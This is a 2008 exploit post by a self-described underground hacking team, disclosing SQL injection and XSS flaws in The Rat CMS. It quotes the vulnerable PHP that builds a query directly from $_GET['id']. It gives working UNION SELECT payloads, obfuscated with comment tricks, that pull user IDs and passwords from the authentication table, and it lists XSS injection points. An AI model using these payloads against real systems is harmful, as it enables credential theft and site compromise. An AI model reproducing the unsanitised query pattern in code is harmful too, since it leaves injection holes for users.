==========================================================

The Rat CMS (SQL/XSS) Multiple Remote Vulnerabilities

==========================================================

,--^----------,--------,-----,-------^--,

| ||||||||| `--------' | O .. CWH Underground Hacking Team ..

`+---------------------------^----------|

`\_,-------, _________________________|

/ XXXXXX /`| /

/ XXXXXX / `\ /

/ XXXXXX /\______(

/ XXXXXX /

/ XXXXXX /

(________(

`------'

AUTHOR : CWH Underground

DATE : 25 June 2008

SITE : cwh.citec.us

#####################################################

APPLICATION : The Rat CMS

VERSION : Pre-Alpha 2

VENDOR : N/A

DOWNLOAD : http://downloads.sourceforge.net/the-rat-cms

#####################################################

--- Remote SQL Injection ---

---------------------------------------

Vulnerable File [viewarticle.php?id=]

---------------------------------------

@Line 5

73: $query = "SELECT title, content FROM news WHERE id=".$_GET['id'];

74: $result = mysql_query($query) or die('Error : ' . mysql_error());

75: $row = mysql_fetch_array($result, MYSQL_ASSOC);

---------

Exploit

---------

[+] http://[Target]/[trcms_path]/viewarticle.php?id=[SQL Injection]

[+] http://[Target]/[trcms_path]/viewarticle2.php?id=[SQL Injection]

-------------

POC Exploit

-------------

http://192.168.24.25/trcms/viewarticle.php?id=-9999/**/UNION/**/SELECT/*
*/user_id,user_password/**/FROM/**/tbl_auth_user--

http://192.168.24.25/trcms/viewarticle2.php?id=-9999/**/UNION/**/SELECT/
**/user_id,user_password/**/FROM/**/tbl_auth_user--

--- Remote XSS ---

---------

Exploit

---------

[+] http://[Target]/[trcms_path]/viewarticle.php/<XSS>

[+] http://[Target]/[trcms_path]/viewarticle.php?id=<XSS>

[+] http://[Target]/[trcms_path]/viewarticle2.php?id=<XSS>

##################################################################

# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos #

##################################################################

[ reply ]